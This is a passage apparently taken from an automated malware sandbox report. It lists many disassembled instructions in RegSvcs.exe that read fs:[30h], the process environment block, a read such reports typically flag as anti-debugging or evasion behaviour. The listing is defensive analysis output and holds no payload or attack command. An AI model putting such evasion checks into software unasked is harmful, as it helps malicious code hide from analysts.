                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBE5E7 mov eax, dword ptr fs:[00000030h]15_2_00EBE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBE5E7 mov eax, dword ptr fs:[00000030h]15_2_00EBE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBE5E7 mov eax, dword ptr fs:[00000030h]15_2_00EBE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECE5CF mov eax, dword ptr fs:[00000030h]15_2_00ECE5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECE5CF mov eax, dword ptr fs:[00000030h]15_2_00ECE5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E965D0 mov eax, dword ptr fs:[00000030h]15_2_00E965D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECA5D0 mov eax, dword ptr fs:[00000030h]15_2_00ECA5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECA5D0 mov eax, dword ptr fs:[00000030h]15_2_00ECA5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F105A7 mov eax, dword ptr fs:[00000030h]15_2_00F105A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F105A7 mov eax, dword ptr fs:[00000030h]15_2_00F105A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F105A7 mov eax, dword ptr fs:[00000030h]15_2_00F105A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EB45B1 mov eax, dword ptr fs:[00000030h]15_2_00EB45B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EB45B1 mov eax, dword ptr fs:[00000030h]15_2_00EB45B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC4588 mov eax, dword ptr fs:[00000030h]15_2_00EC4588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E92582 mov eax, dword ptr fs:[00000030h]15_2_00E92582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E92582 mov ecx, dword ptr fs:[00000030h]15_2_00E92582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECE59C mov eax, dword ptr fs:[00000030h]15_2_00ECE59C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC656A mov eax, dword ptr fs:[00000030h]15_2_00EC656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC656A mov eax, dword ptr fs:[00000030h]15_2_00EC656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC656A mov eax, dword ptr fs:[00000030h]15_2_00EC656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E98550 mov eax, dword ptr fs:[00000030h]15_2_00E98550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E98550 mov eax, dword ptr fs:[00000030h]15_2_00E98550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBE53E mov eax, dword ptr fs:[00000030h]15_2_00EBE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBE53E mov eax, dword ptr fs:[00000030h]15_2_00EBE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBE53E mov eax, dword ptr fs:[00000030h]15_2_00EBE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBE53E mov eax, dword ptr fs:[00000030h]15_2_00EBE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBE53E mov eax, dword ptr fs:[00000030h]15_2_00EBE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0535 mov eax, dword ptr fs:[00000030h]15_2_00EA0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0535 mov eax, dword ptr fs:[00000030h]15_2_00EA0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0535 mov eax, dword ptr fs:[00000030h]15_2_00EA0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0535 mov eax, dword ptr fs:[00000030h]15_2_00EA0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0535 mov eax, dword ptr fs:[00000030h]15_2_00EA0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0535 mov eax, dword ptr fs:[00000030h]15_2_00EA0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F26500 mov eax, dword ptr fs:[00000030h]15_2_00F26500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F64500 mov eax, dword ptr fs:[00000030h]15_2_00F64500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F64500 mov eax, dword ptr fs:[00000030h]15_2_00F64500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F64500 mov eax, dword ptr fs:[00000030h]15_2_00F64500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F64500 mov eax, dword ptr fs:[00000030h]15_2_00F64500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F64500 mov eax, dword ptr fs:[00000030h]15_2_00F64500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F64500 mov eax, dword ptr fs:[00000030h]15_2_00F64500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F64500 mov eax, dword ptr fs:[00000030h]15_2_00F64500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F106F1 mov eax, dword ptr fs:[00000030h]15_2_00F106F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F106F1 mov eax, dword ptr fs:[00000030h]15_2_00F106F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F0E6F2 mov eax, dword ptr fs:[00000030h]15_2_00F0E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F0E6F2 mov eax, dword ptr fs:[00000030h]15_2_00F0E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F0E6F2 mov eax, dword ptr fs:[00000030h]15_2_00F0E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F0E6F2 mov eax, dword ptr fs:[00000030h]15_2_00F0E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECA6C7 mov ebx, dword ptr fs:[00000030h]15_2_00ECA6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECA6C7 mov eax, dword ptr fs:[00000030h]15_2_00ECA6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECC6A6 mov eax, dword ptr fs:[00000030h]15_2_00ECC6A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC66B0 mov eax, dword ptr fs:[00000030h]15_2_00EC66B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E94690 mov eax, dword ptr fs:[00000030h]15_2_00E94690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E94690 mov eax, dword ptr fs:[00000030h]15_2_00E94690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECA660 mov eax, dword ptr fs:[00000030h]15_2_00ECA660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECA660 mov eax, dword ptr fs:[00000030h]15_2_00ECA660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC2674 mov eax, dword ptr fs:[00000030h]15_2_00EC2674
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F5866E mov eax, dword ptr fs:[00000030h]15_2_00F5866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F5866E mov eax, dword ptr fs:[00000030h]15_2_00F5866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EAC640 mov eax, dword ptr fs:[00000030h]15_2_00EAC640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E9262C mov eax, dword ptr fs:[00000030h]15_2_00E9262C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC6620 mov eax, dword ptr fs:[00000030h]15_2_00EC6620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC8620 mov eax, dword ptr fs:[00000030h]15_2_00EC8620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EAE627 mov eax, dword ptr fs:[00000030h]15_2_00EAE627
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA260B mov eax, dword ptr fs:[00000030h]15_2_00EA260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA260B mov eax, dword ptr fs:[00000030h]15_2_00EA260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA260B mov eax, dword ptr fs:[00000030h]15_2_00EA260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA260B mov eax, dword ptr fs:[00000030h]15_2_00EA260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA260B mov eax, dword ptr fs:[00000030h]15_2_00EA260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA260B mov eax, dword ptr fs:[00000030h]15_2_00EA260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA260B mov eax, dword ptr fs:[00000030h]15_2_00EA260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED2619 mov eax, dword ptr fs:[00000030h]15_2_00ED2619
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F0E609 mov eax, dword ptr fs:[00000030h]15_2_00F0E609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EB27ED mov eax, dword ptr fs:[00000030h]15_2_00EB27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EB27ED mov eax, dword ptr fs:[00000030h]15_2_00EB27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EB27ED mov eax, dword ptr fs:[00000030h]15_2_00EB27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F1E7E1 mov eax, dword ptr fs:[00000030h]15_2_00F1E7E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E947FB mov eax, dword ptr fs:[00000030h]15_2_00E947FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E947FB mov eax, dword ptr fs:[00000030h]15_2_00E947FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E9C7C0 mov eax, dword ptr fs:[00000030h]15_2_00E9C7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F107C3 mov eax, dword ptr fs:[00000030h]15_2_00F107C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E907AF mov eax, dword ptr fs:[00000030h]15_2_00E907AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F447A0 mov eax, dword ptr fs:[00000030h]15_2_00F447A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F3678E mov eax, dword ptr fs:[00000030h]15_2_00F3678E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E98770 mov eax, dword ptr fs:[00000030h]15_2_00E98770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0770 mov eax, dword ptr fs:[00000030h]15_2_00EA0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0770 mov eax, dword ptr fs:[00000030h]15_2_00EA0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0770 mov eax, dword ptr fs:[00000030h]15_2_00EA0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0770 mov eax, dword ptr fs:[00000030h]15_2_00EA0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0770 mov eax, dword ptr fs:[00000030h]15_2_00EA0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0770 mov eax, dword ptr fs:[00000030h]15_2_00EA0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0770 mov eax, dword ptr fs:[00000030h]15_2_00EA0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0770 mov eax, dword ptr fs:[00000030h]15_2_00EA0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0770 mov eax, dword ptr fs:[00000030h]15_2_00EA0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0770 mov eax, dword ptr fs:[00000030h]15_2_00EA0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0770 mov eax, dword ptr fs:[00000030h]15_2_00EA0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0770 mov eax, dword ptr fs:[00000030h]15_2_00EA0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC674D mov esi, dword ptr fs:[00000030h]15_2_00EC674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC674D mov eax, dword ptr fs:[00000030h]15_2_00EC674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC674D mov eax, dword ptr fs:[00000030h]15_2_00EC674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F14755 mov eax, dword ptr fs:[00000030h]15_2_00F14755
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F1E75D mov eax, dword ptr fs:[00000030h]15_2_00F1E75D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E90750 mov eax, dword ptr fs:[00000030h]15_2_00E90750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED2750 mov eax, dword ptr fs:[00000030h]15_2_00ED2750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED2750 mov eax, dword ptr fs:[00000030h]15_2_00ED2750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F0C730 mov eax, dword ptr fs:[00000030h]15_2_00F0C730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECC720 mov eax, dword ptr fs:[00000030h]15_2_00ECC720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECC720 mov eax, dword ptr fs:[00000030h]15_2_00ECC720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC273C mov eax, dword ptr fs:[00000030h]15_2_00EC273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC273C mov ecx, dword ptr fs:[00000030h]15_2_00EC273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC273C mov eax, dword ptr fs:[00000030h]15_2_00EC273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECC700 mov eax, dword ptr fs:[00000030h]15_2_00ECC700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E90710 mov eax, dword ptr fs:[00000030h]15_2_00E90710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC0710 mov eax, dword ptr fs:[00000030h]15_2_00EC0710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F5A8E4 mov eax, dword ptr fs:[00000030h]15_2_00F5A8E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECC8F9 mov eax, dword ptr fs:[00000030h]15_2_00ECC8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECC8F9 mov eax, dword ptr fs:[00000030h]15_2_00ECC8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBE8C0 mov eax, dword ptr fs:[00000030h]15_2_00EBE8C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F1C89D mov eax, dword ptr fs:[00000030h]15_2_00F1C89D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E90887 mov eax, dword ptr fs:[00000030h]15_2_00E90887
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F26870 mov eax, dword ptr fs:[00000030h]15_2_00F26870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F26870 mov eax, dword ptr fs:[00000030h]15_2_00F26870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F1E872 mov eax, dword ptr fs:[00000030h]15_2_00F1E872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F1E872 mov eax, dword ptr fs:[00000030h]15_2_00F1E872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA2840 mov ecx, dword ptr fs:[00000030h]15_2_00EA2840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E94859 mov eax, dword ptr fs:[00000030h]15_2_00E94859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E94859 mov eax, dword ptr fs:[00000030h]15_2_00E94859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC0854 mov eax, dword ptr fs:[00000030h]15_2_00EC0854
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F3483A mov eax, dword ptr fs:[00000030h]15_2_00F3483A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F3483A mov eax, dword ptr fs:[00000030h]15_2_00F3483A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECA830 mov eax, dword ptr fs:[00000030h]15_2_00ECA830
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EB2835 mov eax, dword ptr fs:[00000030h]15_2_00EB2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EB2835 mov eax, dword ptr fs:[00000030h]15_2_00EB2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EB2835 mov eax, dword ptr fs:[00000030h]15_2_00EB2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EB2835 mov ecx, dword ptr fs:[00000030h]15_2_00EB2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EB2835 mov eax, dword ptr fs:[00000030h]15_2_00EB2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EB2835 mov eax, dword ptr fs:[00000030h]15_2_00EB2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F1C810 mov eax, dword ptr fs:[00000030h]15_2_00F1C810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F1E9E0 mov eax, dword ptr fs:[00000030h]15_2_00F1E9E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC29F9 mov eax, dword ptr fs:[00000030h]15_2_00EC29F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC29F9 mov eax, dword ptr fs:[00000030h]15_2_00EC29F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F5A9D3 mov eax, dword ptr fs:[00000030h]15_2_00F5A9D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F269C0 mov eax, dword ptr fs:[00000030h]15_2_00F269C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E9A9D0 mov eax, dword ptr fs:[00000030h]15_2_00E9A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E9A9D0 mov eax, dword ptr fs:[00000030h]15_2_00E9A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E9A9D0 mov eax, dword ptr fs:[00000030h]15_2_00E9A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E9A9D0 mov eax, dword ptr fs:[00000030h]15_2_00E9A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E9A9D0 mov eax, dword ptr fs:[00000030h]15_2_00E9A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E9A9D0 mov eax, dword ptr fs:[00000030h]15_2_00E9A9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC49D0 mov eax, dword ptr fs:[00000030h]15_2_00EC49D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F189B3 mov esi, dword ptr fs:[00000030h]15_2_00F189B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F189B3 mov eax, dword ptr fs:[00000030h]15_2_00F189B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F189B3 mov eax, dword ptr fs:[00000030h]15_2_00F189B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E909AD mov eax, dword ptr fs:[00000030h]15_2_00E909AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E909AD mov eax, dword ptr fs:[00000030h]15_2_00E909AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA29A0 mov eax, dword ptr fs:[00000030h]15_2_00EA29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA29A0 mov eax, dword ptr fs:[00000030h]15_2_00EA29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA29A0 mov eax, dword ptr fs:[00000030h]15_2_00EA29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA29A0 mov eax, dword ptr fs:[00000030h]15_2_00EA29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA29A0 mov eax, dword ptr fs:[00000030h]15_2_00EA29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA29A0 mov eax, dword ptr fs:[00000030h]15_2_00EA29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA29A0 mov eax, dword ptr fs:[00000030h]15_2_00EA29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA29A0 mov eax, dword ptr fs:[00000030h]15_2_00EA29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA29A0 mov eax, dword ptr fs:[00000030h]15_2_00EA29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA29A0 mov eax, dword ptr fs:[00000030h]15_2_00EA29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA29A0 mov eax, dword ptr fs:[00000030h]15_2_00EA29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA29A0 mov eax, dword ptr fs:[00000030h]15_2_00EA29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA29A0 mov eax, dword ptr fs:[00000030h]15_2_00EA29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED096E mov eax, dword ptr fs:[00000030h]15_2_00ED096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED096E mov edx, dword ptr fs:[00000030h]15_2_00ED096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED096E mov eax, dword ptr fs:[00000030h]15_2_00ED096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EB6962 mov eax, dword ptr fs:[00000030h]15_2_00EB6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EB6962 mov eax, dword ptr fs:[00000030h]15_2_00EB6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EB6962 mov eax, dword ptr fs:[00000030h]15_2_00EB6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F34978 mov eax, dword ptr fs:[00000030h]15_2_00F34978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F34978 mov eax, dword ptr fs:[00000030h]15_2_00F34978
